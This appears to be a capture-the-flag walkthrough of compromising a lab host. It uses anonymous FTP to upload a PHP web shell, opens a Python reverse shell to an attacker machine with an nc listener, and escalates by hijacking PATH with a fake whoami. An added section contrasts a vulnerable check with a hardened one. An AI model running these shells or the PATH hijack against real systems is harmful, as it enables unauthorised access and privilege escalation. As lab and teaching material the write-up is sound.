We start by scanning the host with nmap -A -T4 -p- 192.168.1.10 -vv (service/OS detection with default scripts, aggressive timing, all 65535 ports, extra verbose)
Then we scan it with dirb http://192.168.1.10 /usr/share/dirb/wordlists/big.txt
The robots.txt file:
We can get around this by changing the browser's User-Agent, following this article: https://www.howtogeek.com/113439/how-to-change-your-browsers-user-agent-without-installing-any-extensions/
Now we reload Firefox:
We enter the path /secret_information:
OK, the FTP port is open and the share is writable; we can log in using anonymous as both the username and the password:
There is a folder called pub that is writable, so we can upload a shell there to gain access.
I uploaded a few different ones and then got a connection:
Put this code in shell.php, then upload it to the FTP service: <?php system($_GET['shell']); ?>
As we can see, we can run commands through the web shell and get the output of id on the system. Now we can get a proper interactive shell by running a Python reverse-shell one-liner through it, with a listener (for example nc -lvnp 4444) already waiting on the attacking machine at 192.168.1.11:
The Python one-liner: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.11",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
In the home folder of a user named Tom there is a script called rootshell; when we run it, it checks whether we are Tom or not.
This gives us a PATH hijacking situation: rootshell calls whoami by name rather than by absolute path, so a fake whoami placed in a directory that comes earlier in PATH will be run instead of the real one. We can do it in a simple way with the following commands:
echo 'printf "tom"' > whoami
chmod 777 whoami
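The following is an added example, not code from the original write-up, showing the PATH hijack end to end against a stand-in for the rootshell check, beside a hardened version that cannot be steered this way. The stand-ins are shell functions, which is an assumption: the real rootshell binary on the box is not reproduced here. The fake whoami is the write-up's trick with the quoting fixed, and 755 is enough for it to run; world-writable 777 is not needed.

```shell
#!/bin/sh
# Added example (not from the original write-up): PATH hijack of a privilege
# check that runs `whoami` by bare name, beside a hardened check.
# Assumption: the vulnerable and hardened "rootshell" checks are modelled as
# shell functions; the real binary is not reproduced.
set -eu

WORKDIR="$(mktemp -d)"            # directory that will hold the fake whoami
trap 'rm -rf "$WORKDIR"' EXIT

# Vulnerable stand-in: whoami is resolved through PATH, so whoever controls
# PATH controls the answer to the check.
vulnerable_check() {
    if [ "$(whoami)" = "tom" ]; then
        echo "access granted"
    else
        echo "access denied"
    fi
}

# Hardened stand-in: a fixed PATH and an absolute path to the tool, run in a
# subshell so the caller's environment cannot influence the lookup.
hardened_check() {
    (
        PATH=/usr/bin:/bin
        export PATH
        if [ "$(/usr/bin/id -un)" = "tom" ]; then
            echo "access granted"
        else
            echo "access denied"
        fi
    )
}

# The write-up's trick with the quoting fixed: a script named whoami that
# only prints "tom". A shebang makes it run regardless of which shell
# performs the lookup; 755 is sufficient, 777 is not required.
plant_fake_whoami() {
    printf '#!/bin/sh\nprintf "tom"\n' > "$WORKDIR/whoami"
    chmod 755 "$WORKDIR/whoami"
}

# Run the named check with the fake whoami's directory prepended to PATH,
# exactly what an attacker does before launching rootshell.
run_with_hijacked_path() {
    plant_fake_whoami
    ( PATH="$WORKDIR:$PATH"; export PATH; "$1" )
}

# Stand-alone demo: the vulnerable check is fooled, the hardened one is not
# (assuming the real user running this is not named tom).
echo "vulnerable check, hijacked PATH: $(run_with_hijacked_path vulnerable_check)"
echo "hardened check,   hijacked PATH: $(run_with_hijacked_path hardened_check)"
```

The hardened variant shows the two fixes that close this class of bug: never rely on the caller's PATH inside a privileged program, and call the helper by absolute path (or better, avoid shelling out and check the real uid directly).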